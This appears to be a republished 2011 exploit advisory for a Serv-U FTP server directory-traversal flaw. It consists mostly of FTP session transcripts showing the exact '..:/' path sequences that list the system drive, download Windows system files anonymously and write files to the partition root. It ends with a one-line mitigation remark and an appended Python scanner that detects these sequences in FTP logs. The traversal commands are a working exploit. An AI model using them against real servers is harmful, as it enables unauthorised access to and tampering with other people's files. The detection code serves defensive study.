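    Serv-U FTP Jail Break (unauthorized directory traversal and arbitrary file download)

    Posted by: 涵韵 | Posted: 2025-6-27 15:41

    The programs (methods) provided on this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!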

    The code is as follows:
    ----------------------------------------------------

    Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
    ----------------------------------------------------

    /*
    sebug.net
    A crafted ..:/ sequence lets a client traverse the server's directories and download arbitrary files.
    Affected versions: 6.4, 7.1, 7.3, 8.2, 10.5
    */
    Affected:
    220 Serv-U FTP Server v7.3 ready...
    220 Serv-U FTP Server v7.1 ready...
    220 Serv-U FTP Server v6.4 ready...
    220 Serv-U FTP Server v8.2 ready...
    220 Serv-U FTP Server v10.5 ready...
    ----------------------------------------------------

    C:\Users\kingcope\Desktop>ftp 192.168.133.134
    Verbindung mit 192.168.133.134 wurde hergestellt.
    220 Serv-U FTP Server v6.4 for WinSock ready...
    Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)
    331 User name okay, please send complete E-mail address as password.
    Kennwort:
    230 User logged in, proceed.
    ftp> cd "/..:/..:/..:/..:/program files"
    250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
    ftp> ls -la
    200 PORT Command successful.
    150 Opening ASCII mode data connection for /bin/ls.
    dr--r--r-- 1 user group 0 Nov 12 21:48 .
    dr--r--r-- 1 user group 0 Nov 12 21:48 ..
    drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundation
    drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
    drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
    drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
    drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
    d--------- 1 user group 0 Jul 8 16:12 InstallShield Installation Information
    drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
    drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
    drw-rw-rw- 1 user group 0 Feb 12 2011 Java
    drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
    drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
    drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
    drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
    drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
    d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
    drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
    drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
    drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
    drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
    d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
    226 Transfer complete.
    FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
    ftp>
    ----------------------------------------------------

    with write perms:
    ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
    ----------------------------------------------------

    and as anonymous ftp:
    ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
    200 PORT Command successful.
    150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
    226 Transfer complete.
    FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
    ----------------------------------------------------

    This works too!!! :
    220 Serv-U FTP Server v7.3 ready...
    Benutzer (xx.xx.xx.xx:(none)): ftp
    331 User name okay, please send complete E-mail address as password.
    Kennwort:
    230 User logged in, proceed.
    ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
    200 PORT Command successful.
    150 Opening ASCII mode data connection for /bin/ls.
    .
    ..
    AUTOEXEC.BAT
    boot.ini
    bootfont.bin
    bsmain_runtime.log
    CONFIG.SYS
    Documents and Settings
    FPSE_search
    Inetpub
    IO.SYS
    log
    MSDOS.SYS
    msizap.exe
    MSOCache
    mysql
    NTDETECT.COM
    ntldr
    Program Files
    RavBin
    RECYCLER
    Replay.log
    rising.ini
    System Volume Information
    TDDOWNLOAD
    WCH.CN
    WINDOWS
    wmpub
    226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
    FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
    ----------------------------------------------------

    Sometimes you need to give it the path:
    ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
    ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
    200 PORT Command successful.
    150 Opening ASCII mode data connection for /bin/ls.
    .
    ..
    360
    Adobe
    ASP.NET
    CCProxy
    CE Remote Tools
    cmak
    Common Files
    ComPlus Applications
    D-Tools
    FFTPServer
    HTML Help Workshop
    IISServer
    InstallShield Installation Information
    Intel
    Internet Explorer
    Java
    JavaSoft
    K-Lite Codec Pack
    Microsoft ActiveSync
    Microsoft Analysis Services
    Microsoft Device Emulator
    Microsoft MapPoint Web Service Samples
    Microsoft MapPoint Web Service SDK, Version 4.0
    Microsoft Office
    Microsoft Office Servers
    Microsoft Silverlight
    Microsoft SQL Server
    Microsoft Visual SourceSafe
    Microsoft Visual Studio 8
    Microsoft.NET
    MSBuild
    MSXML 6.0
    NetMeeting
    Outlook Express
    PortMap1.61
    Reference Assemblies
    Rising
    SQLXML 4.0
    SQLyog Enterprise
    STS2Setup_2052
    Symantec
    Thunder Network
    TSingVision
    Uninstall Information
    Windows Media Player
    Windows NT
    WindowsUpdate
    WinRAR
    226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
    FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
    ftp>

    @Sebug.net [ 2011-12-01 ]
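    Mitigation provided by 脚本: this class of problem can be prevented by configuring Serv-U's permissions; be sure to pay attention to Serv-U's security settings.

    Source: https://www.jb51.net/hack/41307.html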
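
    One way to look for the `..:` and `:..` path segments from the session above in FTP command logs. This is an added example, not part of the original advisory or of Serv-U; the log line layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# FTP verbs (RFC 959 and common extensions) that carry a path argument; the
# client commands on the page (cd, ls, get, put) go out as CWD, LIST/NLST,
# RETR and STOR.
PATH_VERBS = {"CWD", "LIST", "NLST", "RETR", "STOR", "APPE", "DELE",
              "MKD", "RMD", "RNFR", "RNTO", "SIZE", "MDTM"}

# A whole path segment made of ".." with colons before and/or after it,
# bounded by a separator, whitespace, a quote, or either end of the argument.
DOTDOT = re.compile(r'(?<![^\s\\/"])(:*\.\.:*)(?![^\s\\/"])')

def decorated_dotdots(argument):
    """Return the '..:' / ':..' style segments found in one command argument."""
    return [m for m in DOTDOT.findall(argument) if ":" in m]

def scan(log_lines):
    """Map client -> [(verb, argument, hit_count)] for flagged commands."""
    # Assumed line layout: '<date> <time> <client> <VERB> <argument...>'
    findings = defaultdict(list)
    for line in log_lines:
        parts = line.rstrip("\n").split(" ", 4)
        if len(parts) < 5:
            continue  # verb without an argument, or a malformed line
        _date, _time, client, verb, argument = parts
        if verb.upper() not in PATH_VERBS:
            continue
        hits = decorated_dotdots(argument)
        if hits:
            findings[client].append((verb.upper(), argument, len(hits)))
    return dict(findings)

# Constructed sample log (documentation addresses); not real server output.
SAMPLE_LOG = [
    r'2011-12-01 10:00:01 192.0.2.10 CWD /pub/docs',
    r'2011-12-01 10:00:05 192.0.2.10 CWD ..',
    r'2011-12-01 10:00:09 192.0.2.10 RETR notes..:txt',
    r'2011-12-01 10:01:12 198.51.100.7 CWD /..:/..:/..:/..:/program files',
    r'2011-12-01 10:01:30 198.51.100.7 RETR ..:/..:/..:/..:/windows/system32/calc.exe',
    r'2011-12-01 10:02:02 198.51.100.7 LIST -a ..:\:..\..:\*',
]

if __name__ == "__main__":
    for client, rows in scan(SAMPLE_LOG).items():
        for verb, argument, count in rows:
            print(f"{client} {verb} x{count}: {argument}")
```

    A hit records an attempt only; the server's reply code for the same command (for example the 250 shown in the session above) tells whether the request was honoured.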